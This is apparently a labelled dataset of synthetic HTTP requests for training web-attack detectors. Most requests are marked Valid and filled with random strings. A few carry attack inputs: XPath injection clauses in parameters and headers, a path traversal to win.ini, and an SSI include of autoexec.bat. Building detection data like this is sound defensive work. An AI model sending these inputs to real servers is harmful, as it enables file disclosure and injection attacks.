UA-OS: Win98
UA-Pixels: 015x0585
Via: HTTP/1.7 26.146.183.19
Transfer-Encoding: gzip
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ettne=s9oxe)(   |(gkiii=*)&o2tlhpaewsv0=rprhntiqw&itp56ehdmr=qLoisenralAmcrc&3oanT=3echoeuapw2&ciframem6s=a5rGq&oeaeaaet=49425407&uaeJ0e=e/pEm&vs=aop8d&tnhoenier=aast&aw=Dmojmt9iessfh5iekw&s6umrdzoaP3=beTppeee&rNRQ-et=oobys9

End - Id: 36910
Start - Id: 49069
class: XPathInjection
GET /2pGu5.Gvgh6Eh/tiItuTatciynz42/1scAylasxY5/kJT.jpeg?ti2aoNrijzodth=%7C+bA4%5BaE%7E-all+I&RCftp0nTWD=YTe&bgo0xs9tec=uce1qRPOE&etu=oDk&lcdeptlyte=4&aao=urcp+logawem&06ISkJ5Y8n=iBni&zotthfemeeapdlm=tt%3Bwherehgs5xn&mHs4glncfe3a=pue9ri&uAEkCtertahte0n=accmdgroup+bytY9ttvcida5&4URprocessing-instructionRDAVEqJT=nag&op875i=%3E&t6dermlsantS=uhaasrtaihqnu&trsl=wGhli%2Fddd%2Fl5enn%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D61%5D+++++or+%27rra3rj%27+++%3D%27 HTTP/1.0
Host: 235.108.97.70:6
Connection: mraara
Accept: application/postscript;q=0.5, application/*;q=0.8, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: dw-mw4, dlRe5eo-haasr4
Cache-Control: no-store
Client-ip: 164.173.183.167
Cookie: 6ynto3d4=W l-eN;g8NaG_fFWand0@=nrudnoon;dYPKU=%e'%=roteia t gqniwp-;awnno=258584
Cookie2: $Version="920"
Date: Sat, 08 Jul 06 01:59:36 UTC
ETag: "91bonU_8hX5Lp8pQC"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Wed, 25 Feb 04 10:49:38 CET
If-Unmodified-Since: Thu, 04 Jan 07 22:30:31 UTC
If-Match: "sStgjOQPpH2mAv."
If-None-Match: *
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 6
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: NTLM U2VoMXRydHllZ3J5OHNvbG0wdGlzdGFxamJrb2lvZXNnM2Rzb0Yy
Range: 115-9
Referer: http://www.L9m3eNda.fr/stho/creI/asyremp.txt
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/6.3 (compatible; Konqueror/1.2; Mac OS X; ehkyitidna; 1uAindo9)
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: FTP/8.8 www.iuates.htm, HTTP/9.3 243.159.36.87:4755
Transfer-Encoding: elsu; iSexzRsq=nkaToA
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49069
Start - Id: 4143
class: Valid
POST /5O34NnY7t/Tre1j3rjr8edpl/wcS2o2B.7/a6FT.zBO/ElseLbweni3tn7E/hcue6/5ms4C4yKqF-zexP7e/syJxSAIOF4uWD/eCZLuB.shtml? HTTP/1.0
Content-Length: 286
Content-Language: diYh,np7ak
Content-Encoding: identity
Content-Location: /gsEprN/teyC/rrrol.swf
Content-MD5: b3Rzb2RLZXBkZGFuZnRuSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Nov 06 15:54:43 CET
Last-Modified: Thu, 17 Jan 08 18:15:18 CET
Host: www.o5pac.biz:6
Connection: aeied
Accept: text/html, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i8nWaek-nneDho;q=0.1, hdD8-NbYthd, w-nua;q=0.8, trnzOsnh-I37eaiu, nt-qaet8t
Cache-Control: only-if-cached
Client-ip: 14.99.234.115
Cookie: tEgietsona=3ihaioltn3nktd;kmgudcwoheu=83108419;ORW@cKASpe=eott7eU
Cookie2: $Version="91"
Date: Tue, 04 Jul 06 22:57:42 GMT
ETag: "nogUv0HUQHcnxGP_T"
Expect: 8xxcnqmy=toneaeYa;lheote8i=iHsioj
From: EVr9al@erotthit.org
If-Modified-Since: Wed, 28 Apr 10 22:35:07 GMT
If-Unmodified-Since: Sat, 27 Feb 10 11:58:07 UTC
If-Match: *
If-None-Match: "6Kv6aNuPimmny8PKh2D-"
If-Range: Sat, 08 Sep 07 21:54:16 GMT
Max-Forwards: 7
MIME-Version: 7.4
Pragma: putsl='ht'
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Digest uri=http://tqodcT1n.de/ut7e/tBtaq/yoetvrnT/ontae5M/stYggc02.swf
Range: -39074,255-3
Referer: /tmmtyR/2TzOo/a0aigfa/tfe8ay.png
TE: trailers,gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: 12dHohxiht (uEBec1cp6; a1ZF7Q; reue@JP)
UA-CPU: Sparc
UA-Disp: 192,906,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4283x806
Via: 6.9 243.67.101.79:1, HTTP/3.8 www.heWMt.gif:768, 2.8 177.248.203.194
Transfer-Encoding: gzip
Upgrade: hwse/6.1, u9heh/7.4, irm9/0.9, 6fero/4.3
Warning: 826 40.134.212.239:799 "oazhouehnn3r" 
X-Forwarded-For: 120.79.175.50
X-Serial-Number: 5833814723
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

noothode=u pehutu9&jhnfsya2pFrrc=r7Rrttvaahwna3otwa&olNenuogryrnsd=$eon&Hh1udetf=rSl52V5&s3tuOdyiprt=eR Cietn&ae=iTh&at=lceh&eatraS3uaocvti=ad&OsSoonot=31&sttlndtsr=oALY4dbn1sw&zd=<processing-instructiond&enio03emulq6ei=ifIeL@s&IOligmju=bUD37oiLqIR7&mPprd0=I>ls o0a''>a~

End - Id: 4143
Start - Id: 21102
class: Valid
GET /jziGzA/6tSHa73/gdWA3VQG@lJa44Az5lTO/Ipendepyhtgnsho.js?pttcualioa=-zhbiEoptmapsvotw&oe9ooe=amh7i0omochae%29w&esp=japrocessing-instructionnttrcppbosa&maa3touos3Ts7t=knu&Ct8xFEW=h%3B+thh+P+Rnl4%2FSisGqi&EeX32=774&_kWdmCm=03106220&Nrmq=34&p6imlo=aacall3rspioR%2Be&t8ltNotrrsegs=7815699&alkny=967X2fTsqsC HTTP/1.0
Host: www.oeLscetieo.org:25
Connection: iatooe
Accept: application/x-tar;q=0.0, image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 41.159.222.224
Cookie: f2scNodttjnrdth=477570;ihnrmi=1;gGLW=A&tmptttc=so;o3nt3s=9526;ei1ehQeetps=A tojm mk@b;sndhriijtwoce=s1X
Cookie2: $Version="4"
Date: Thu, 28 Feb 08 12:36:19 GMT
ETag: W/"ftGWEArrI0_-kyK"
Expect: hepthn
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Mon, 06 Mar 06 22:27:34 UTC
If-Match: *
If-None-Match: "wqJmr30-wf45uIVp5u"
If-Range: *
Max-Forwards: 3460
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: Basic T2UxczpIT2tlMw==
Range: 72-,4-191
Referer: /arnlse.swf
TE: chunked;q=0.4,deflate
Trailer: If-Range
User-Agent: glsb (nBMuo4)
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: 8.5 56.51.254.48
Transfer-Encoding: identity
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 276 4.213.123.32 "hncpbonhaOar" "Sun, 27 May 07 02:12:34 UTC"
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 62118973546819667200
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21102
Start - Id: 12688
class: Valid
GET /Sn4p3Mmee/u18eisr3dnh0Eaei5/aJ3ZS1/bAopenipwindow.openavvQschild/8L/fwauyjsangt/nlIollesowhad/1bl/slm/ihxlNrieLbCtf8on5s/e1nfjjgBU_ZzG.mspx?25_tje5gPk=tMxF2S.MDp&teSveswhDoiibn=tHt&arWneo=logo&Solljlu9r=7oegoibin&9RPvryBup-=Vinnoemn7&he-likeTinput=2+&mrrthss=nerycfoi%3Aso&sicy=7253424531&cmocha_26vc8od0dx=thsgqe&K1Ncat2=uiohlall+%2B+aari&nSl1htaa3id=df6&ir=00331 HTTP/1.1
Host: 8.147.216.12
Connection: close
Accept: */*;q=0.8
Accept-Charset: shift_jis;q=0.0, big5, euc-cn, x-mac-hebrew
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 141.142.203.127
Cookie: 2fyii5zi=aajr ;8seOioDetaictwf=dphuc;tetcwindow.openXn_=29655929
Cookie2: $Version="994"
Date: Mon, 18 Dec 06 02:46:47 CET
ETag: W/"xjQfWzKIIQX-LrrXn"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Mon, 21 Dec 09 03:57:52 UTC
If-Unmodified-Since: Tue, 23 Oct 07 10:15:02 UTC
If-Match: *
If-None-Match: "Y2Q6rWgTT@BZEYHg2@y"
If-Range: Mon, 15 Feb 10 15:54:55 UTC
Max-Forwards: 1
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic bzJtc3RTdDpyc3JnaXB0Tw==
Authorization: Ss5thm wpREcn=i9m5bl
Range: 123920-
Referer: /Iatt/in5Adl/thgysr.php3
TE: trailers
Trailer: If-Match
User-Agent: 2Vrettiie/1.2
UA-CPU: Sparc
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: HTTP/9.5 213.207.11.98, HTTP/0.8 www.yein.jpeg, 1.5 www.iLu7rR.tiff
Transfer-Encoding: identity
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 641 www.nTPq.png "nteo1bei1ie" "Sat, 05 Apr 08 24:06:12 UTC"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 91220427481224
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12688
Start - Id: 18823
class: Valid
GET /iiche1saRcupo5tolCe/nCJM/fJ8/po/xcallEkA3VgYincludeQLv.png?KO.kEPm8UZ=foieyecrn&uacmr=ha77&h6xtjn9eehd9uqy=ua8yq%3Dedu%29nuunoIIn&etisal=%250nds&4dm=aa5GwlATIFIV&shag=fscu&taannu5sh=5068549&1KbXHIEKhome=gNE&x_VL=5tsIrt0x%27&ismse=a%40dtyta&suohbBi=ohettoOielhatlen&i8bsE0tvshlco8=pe%26iddNMeautoexec%25le+m+i HTTP/1.0
Host: www.sihra.de
Connection: xtci
Accept: video/mpeg;q=0.1, video/quicktime;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: o9orSce-niGA;q=0.2, 8ox-alr;q=0.8, ghn-ek, m3ofl-eeoobol, latMHri-I;q=0.4
Cache-Control: only-if-cached
Client-ip: 208.166.219.41
Cookie: 2nothreoe=ecle0itrot9l;l8tepysboig=tlalma8agooTe;rnblcits9i=gopasswd;sS7omaJaa=desi
Cookie2: $Version="221"
Date: Wed, 06 Oct 04 12:36:11 CET
ETag: "4886g6T1jjKecgXhjKA3"
Expect: 100-continue
From: b4nur@3Jrln.com
If-Modified-Since: Fri, 09 Jul 04 13:59:03 GMT
If-Unmodified-Since: Thu, 10 Jun 04 04:59:00 CET
If-Match: "NUWFuGMtdVgUBDN1E"
If-None-Match: *
If-Range: Sun, 22 Feb 09 23:02:25 CET
Max-Forwards: 2
MIME-Version: 9.5
Pragma: mUml='rEucj'
Proxy-Authorization: Basic T2FvaTpndXR0NA==
Authorization: Votbd tlnbs=eeoij
Range: -0457,62668-,60-4
Referer: http://www.UpeC0fs.gov/ecgnsxe5/twsjfri/j8OeLh/7sSoe.bin
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/7.4 (X11; U; Linux i586 2.5; la-dp; rv:7.9.9) Gecko/63331226
UA-CPU: x86
UA-Disp: 941,1451,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4147x8311
Via: FTP/2.6 248.48.25.184, 3.4 17.69.165.126, 1.2 www.asDl6.tiff
Transfer-Encoding: iyma; teit=heooaa
Upgrade: uEn/4.9, cna/4.3
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18823
Start - Id: 34415
class: Valid
POST /wtvbaqegde5OdnSsxttp/ex8lhmhsEg/nUI.hp6u9BQXs6q7j/elEorafay4pnni/UrwinntNut/balnsduuaHepfi3han/mueh9evtweE/h3yhTdtsse9hwel/ra63r5i5ghulUeiaedzt/DbuYQP57N9nxB/e-Q3ICqt/sXi.bin? HTTP/1.1
Content-Length: 150
Content-Language: lretir,i,exmirao
Content-Encoding: compress
Content-Location: http://www.etxe.gov/Nnimy/tdne6a/aEair/cnkvobsi/oqhshe.wmn
Content-MD5: ZWJmaWdybG9vb2xyaE5odA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Oct 08 01:46:17 GMT
Last-Modified: Sun, 19 Nov 06 18:55:55 GMT
Host: www.en0mgFt.uk
Connection: 5r0rh4m
Accept: image/*;q=0.6, image/gif;q=0.4
Accept-Charset: isiri-3342;q=0.9, windows-1253;q=0.4, iso-8859-6, cp-936, iso-2022-kr
Accept-Encoding: identity, identity, deflate, deflate;q=0.5
Accept-Language: *;q=0.9
Cache-Control: max-age=6898
Client-ip: 98.127.115.183
Cookie: emnitoectT=36;raehrhime5n=t8|c;1o9=gaxt;ghotoeXalctene=select;.hf6Y9RBdh=Monm;2mtdhgvouy=031091
Cookie2: $Version="3"
Date: Sat, 01 Jul 06 17:20:51 GMT
ETag: W/"XIaDjvEX2Jo.xZ4qF"
Expect: 6sjqd
From: oraoc@noaiej.com
If-Modified-Since: Thu, 23 Oct 08 18:23:33 GMT
If-Unmodified-Since: Wed, 19 Oct 05 18:58:53 GMT
If-Match: "J08gSg4y8UON1yQR2Uw"
If-None-Match: "LYt3ZeazWiR6-2cyh"
If-Range: "i4Xo9I8RKaHHIPPhXG-"
Max-Forwards: 4768
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="91Ed0CCc3Fc4F1F67Ad2f1f551CE9C3F"
Authorization: NTLM b3N5ZHR0ZWFpcHVkZzhuMGVpNnJmc21lbm43aG1sZWEyaDRoZnhaYWx0ZG41Nmxo
Range: 4-,863-346
Referer: http://daugdl.com/0t7dmrn/hdsd/doas/rJinld.php
TE: chunked;q=0.2,gzip;q=0.7,chunked;q=0.8
Trailer: Upgrade
User-Agent: niFes (lCHFd1; t4nk1qn; i8no@4QKFz)
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 995x932
Via: Htu/2.9 www.EeEse9e.js:622, 5.3 www.uqTfs.htm:9, HTTP/5.6 www.mqcIHje.gif
Transfer-Encoding: iwou; peqidpe=tefdi
Upgrade: ovAeer/6.4, irvwrQ/0.5, snd8l/4.6, ann/7.0
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 78483415571
----: -----------
~~~~~: ~~~~~~~~~~~~~~

bhotagen=7219&tgentu5yolR=ex1_yvaA&iigrdwdbminxlnL=139&6ndernnarnrtmc=7ilo&tOds=o &eao4oe9o1cnnyis=:a206kTknt:&IgvU2JlibFS=65&QqZeL_HzKctelnet=326

End - Id: 34415
Start - Id: 26568
class: Valid
GET /6Lpasswddy3F9mailjX/vt/pln.LboXAq4y6IeuMius.css? HTTP/1.0
Host: www.miGewsr1s.st
Connection: bteuwToT
Accept: audio/*
Accept-Charset: iso-8859-3, macintosh;q=0.5, iso-8859-8-i;q=0.3, x-mac-ce
Accept-Encoding: deflate;q=0.0, compress
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 126.247.210.228
Cookie: RiulnfceLedpnde=tDHS93uKen;smcitdhTJn=11498
Cookie2: $Version="969"
Date: Fri, 29 Aug 08 16:10:55 CET
ETag: W/"x1vA9txJotiTBeEn4fk"
Expect: re3Te=Etya;hfIed2s
From: ndorli@calYa.it
If-Modified-Since: Wed, 27 Jul 05 20:32:18 CET
If-Unmodified-Since: Thu, 21 Jan 10 04:30:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 614
MIME-Version: 9.3
Pragma: dEnt='Srutetfs'
Proxy-Authorization: Basic ZWh1YTVnOnNvZTc=
Authorization: Basic YWRlaWk6ZWdmNw==
Range: 5377-633943,-28808
Referer: /axtoets/cvrea/moriekG/LlnnaIn.mpeg
TE: trailers,trailers
Trailer: If-Match
User-Agent: Wreohbie (5Q0Un6; coTA1S; dJVgW3bMqi; t7@vzFH)
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6083x8354
Via: 2.8 www.fnHlded6.html, 4.3 www.dqos.tiff, 8.9 156.171.224.93
Transfer-Encoding: eeur5m
Upgrade: fmyf/7.7, s17U/8.8, yna/1.4, uaae/7.2, crI/4.0
Warning: 032 www.oghexy5t.html "njwthy" 
X-Forwarded-For: 14.228.155.87
X-Serial-Number: 693373977262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26568
Start - Id: 45115
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: 52.134.11.104
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: windows-1257, ks_c_5601-1987
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 188.12.230.231
Cookie: ndeinet8izPIk=lrnM1;fni=0759297;PXxmlKl0r=cTS&es :++Atscriptnnwto 7;ot7ineN=4CPsb3y2
Cookie2: $Version="70"
Date: Wed, 12 Oct 05 04:47:53 CET
ETag: W/"g5uJDiBYPExNZU.8EzYE"
Expect: uhxrdEf=ynXs4rl3
From: nsarxd@yvorsnirh0.be
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Tue, 20 Apr 10 20:45:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4805
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: /rsth1/irLeeh/a1ismtn.gif
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.4 (X11; U; Linux i586 4.7; at-ed; rv:8.2.9) Gecko/51085245
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0464x327
Via: HTTP/4.7 255.126.210.187
Transfer-Encoding: gzip
Upgrade: nu7ne/3.2
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 785532867
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45115
Start - Id: 50037
class: XPathInjection
PUT /sfe/YsrcpA8LoQS/aADY1Rg6/n3tPf3H_1R6q5DTzGd4/tdx9ZWuIqgCbYFI9n/0.026BBIL.css? HTTP/1.0
Content-Length: 44
Content-Language: t
Content-Encoding: gzip
Content-MD5: dHB0YnBWcm90SG9zZXRvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jan 07 21:44:28 CET
Last-Modified: Thu, 03 Apr 08 21:14:56 GMT
Host: www.sidn8RNmr.ch
Connection: nmlegeoP
Accept: audio/*
Accept-Charset: x-mac-ce;q=0.0, macintosh, x-mac-icelandic, windows-1252, euc-tw;q=0.5
Accept-Encoding: ocfq/Ifn/aariy/child::node()[position()=297]  or   'tE9tLe'   =   '
Accept-Language: p1seity'    or  count(path/child::node()[position( )=((   i + j    +    k   +   l    +1)]    |    path/child::*()[position()=(k+1)])=1   or     'm85mle' =  '     aiifz4'    or
Cache-Control: no-store
Date: Sat, 05 Apr 08 03:40:00 UTC
Expect: 100-continue
If-Unmodified-Since: Fri, 04 Jun 04 11:30:44 GMT
If-None-Match: "pX8p4WY8Fy8gf1M-nSFX"
Max-Forwards: 251
MIME-Version: 4.2
Proxy-Authorization: Digest realm
Authorization: NTLM YmRuZWVhZWVyd3kydHNhb2NmS01oZW95MmRJbGxrc2lpdDFv
Referer: /etwrjm/eslnenr/tc4gnn0e/eait.css
User-Agent: Mozilla/3.3 (compatible; bs3e; Windows NT; ynQndy1ssu)
UA-CPU: MIPS
Via: 3.7 49.40.173.193, FTP/6.6 www.ptjuo.jpg, HTTP/8.0 www.q9prmr.js
X-Forwarded-For: 5.28.189.137
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

KegST=taeh7tu7ytcr&wfyabn6ht=8k29pernto1etht

End - Id: 50037
Start - Id: 2229
class: Valid
GET /zbj8A2LBanrURMqve_w/nuklInlsawawehu/bbuBXcOKZ2/tzFn8JlHyOKn.yR/VT-R3x-Uboot.iniPc/nqaHsCCvgdzN15-rSh/uz7_KpassthruzOCzf/ds2rCvmeccxveps.aspx?x9mXwKfromT=405159&Vasor1dn=eolseoofat%3EadNs&Ilsv=y9aThRxoaWye&paIaoEwegoh72=Ronph-&fU0xYPGlpj1V=76 HTTP/1.0
Host: 206.83.7.192:4128
Connection: keep-alive
Accept: text/html;q=0.3
Accept-Charset: windows-874;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 119.152.190.17
Cookie: 1DCvIVoptU1=1882
Cookie2: $Version="1"
Date: Thu, 06 Mar 08 23:00:14 CET
ETag: "Uvy.yQT4V-x.0R@WV"
Expect: 100-continue
From: qihm@deseaahi.de
If-Modified-Since: Sun, 19 Apr 09 12:41:09 CET
If-Unmodified-Since: Sat, 17 Nov 07 20:34:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 545
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest response="4216772A5CecEFaA8c9aAfE01bB8C2cc"
Authorization: leeam ihhdoeon=ytpp
Range: -9799,98225-
Referer: /itirnn9/avEar/3fnts.conf
TE: trailers
Trailer: If-Modified-Since
User-Agent: bamotnZn9t4xHtidaiSe
UA-CPU: PowerPC
UA-Disp: 006,895,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 709x4078
Via: daTr/9.9 www.mecTtt.js, HTTP/9.0 77.55.45.72, HTTP/2.6 71.70.38.164:54
Transfer-Encoding: identity
Upgrade: 1pptr/8.7, nps/5.0, rwa/1.0
Warning: 122 30.172.240.80 "fitmirsEmmaXskma" "Wed, 12 Apr 06 10:10:30 GMT"
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2229
Start - Id: 26776
class: Valid
GET /swODIR4kT.VE4/mdnIo2atctxaliratbNe/hCteUoawkUEti/CYChaving_@k/esidn/hOLJc7qM7RQB/ztcltDqsh2gsciEah/objectservicesa/teurn2/aoaeWLoe7/4.2p7Wv.nsf?l3n=32 HTTP/1.0
Host: 142.142.90.162
Connection: keep-alive
Accept: application/x-tar, application/x-tar, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: tnrc-Tm1Hrcd, nusd-in;q=0.1
Cache-Control: cl='i6dgn'
Client-ip: 120.60.149.77
Cookie: l3r9ofne0trd=60;fbrAos0xcwbd=01;lcl8tafYehtia=31
Cookie2: $Version="64"
Date: Mon, 04 Aug 08 22:37:42 UTC
ETag: "ecRAGY-3geTFtmku3"
Expect: 100-continue
From: uo62ugt@sLsomat.biz
If-Modified-Since: Wed, 20 Feb 08 10:21:49 UTC
If-Unmodified-Since: Mon, 12 Oct 09 20:02:42 UTC
If-Match: "J2w8kFRyMkXghz8SY"
If-None-Match: "wCGLgJMuyfJgikPLqK"
If-Range: Thu, 25 Sep 08 13:13:05 GMT
Max-Forwards: 010
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: desDsm geshl54E=ngonva
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: 76-3,2076-,-744104
Referer: http://isaavl.it/Nhwaes8h.mpg
TE: gzip
Trailer: From
User-Agent: Mozilla/3.6 (X11; U; Open BSD i386 4.0; 4e-S0; rv:9.4.2) Gecko/14461345
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 358x270
Via: HTTP/5.7 www.tltShws.shtml
Transfer-Encoding: gzip
Upgrade: rrraa/9.2, boeih/0.1, thxga/5.3, daihfa/0.5
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26776
Start - Id: 30290
class: Valid
GET /jqBetcconnectstyleJE6Uaz/pllt/tcWmtt1bgr6ni.mdb?slxnradItil2=9&hp8gNem9aWghe=59741&hL=fedri0eeOid&bGhidySbRNnetcat=31248&ansgE4snrtDhx=dz&au6Irbnt1azIl=tRGgb7%40JK&.M7VsselectTM_qa.=4eenire8&ey=g+awhereobcopyhselectohi2aqallca0&gt7y.E18Cy=tuvslrDskqniv3d6he&twthrr=730760&HRZtUfehw9=gsam1ue HTTP/1.1
Host: www.emrMisl.gov
Connection: 8guawmtc
Accept: */*
Accept-Charset: iso-8859-4, windows-1251, euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=1454
Client-ip: 15.129.119.139
Cookie: MYTC=9B@mGPZ8RyYW;teugwdE23daeC=ltsalea
Cookie2: $Version="18"
Date: Mon, 23 Feb 04 19:13:04 GMT
ETag: "kPrrE259PGi65-tL"
Expect: 100-continue
From: hgNhns@5tun.biz
If-Modified-Since: Mon, 23 Mar 09 18:55:20 UTC
If-Unmodified-Since: Sat, 14 Nov 09 10:34:52 UTC
If-Match: "xnxGeJz.cuFrDtJf5"
If-None-Match: *
If-Range: Mon, 27 Nov 06 12:32:57 GMT
Max-Forwards: 1669
MIME-Version: 1.6
Pragma: jdv=kfEea
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: Basic YXRhZXR0OmlwYXlh
Range: -915389
Referer: http://www.n40y.ch/oRlmtha/aStjssop/otyace.mp3
TE: trailers
Trailer: Range
User-Agent: ycbreTasno (srIqoI; bFX1DVB2; rjMZkuJ7QO)
UA-CPU: MIPS
UA-Disp: 132,042,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 691x450
Via: Usalti/0.8 www.mei5.png
Transfer-Encoding: identity
Upgrade: 1nt/1.0, ro5lno/8.9, ef7eT/2.2, flzros/0.3, raaae/2.1
Warning: 610 www.asyfa7.png:791 "eaiobtefu" "Tue, 13 Apr 10 21:48:36 UTC"
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 60742
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30290
Start - Id: 40486
class: SSI
GET /u5dhdeiNsiJatsrrbwc/snnvhay4ttdointag6y/4BZFKw3Gzt6X6LPcas.bin?cd=3IsJt6Ev83%40&izfcqnilzqIibo=pd7%3BcueTSHAdrop&rt0doovRoyreeo6=%3C%21--+%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&2aga8N3=5&nsneN=7234627&cordri=h&tisuhaxgemn2fn=3&HWqpGUx4fUFu=qxl&nrtebnetdid=s4s%25e6xtermRdt7%3Bamntte%26&oes7dprrqnthr=dBg%28itla&bd3ka=8&iamiEeaaeistai=c7ogk7tasEtsdr&0P66=78649611&dh=cdheif HTTP/1.1
Host: 213.231.112.140
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: rceeeef-t8hs, 9uedi25l-c
Cache-Control: min-fresh=70
Client-ip: 178.48.213.72
Cookie: g1153G=mnodexp_ar;tvcnesnatOtske=]oss
Cookie2: $Version="027"
Date: Mon, 08 Mar 10 09:30:36 CET
ETag: "a.QN3Ry4VSFG10B9J-h"
Expect: f1jsa=ntt7oem
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Tue, 30 Jun 09 04:56:40 UTC
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: "tEdw81VlXU7Er2rTK"
